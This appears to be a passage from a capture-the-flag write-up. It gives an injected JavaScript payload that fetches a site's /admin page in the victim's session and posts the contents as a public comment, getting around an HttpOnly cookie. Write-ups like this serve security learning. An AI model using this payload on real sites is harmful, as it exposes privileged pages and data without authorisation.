The cookie is HttpOnly now, but we only care about the contents of `/admin`, not the cookie, so we can use the same payload for `Subdomain Takeover - Easy`, but without doing the subdomain takeover.

```
fetch('/admin').then(r => r.text()).then(d => {
  let data = new URLSearchParams();
  data.append('name', 'admin page');
  data.append('comment', d);
  fetch('/new-comment', {
    method: 'POST',
    headers: { "Content-Type": "application/x-www-form-urlencoded" },
    body: data,
  });
})
```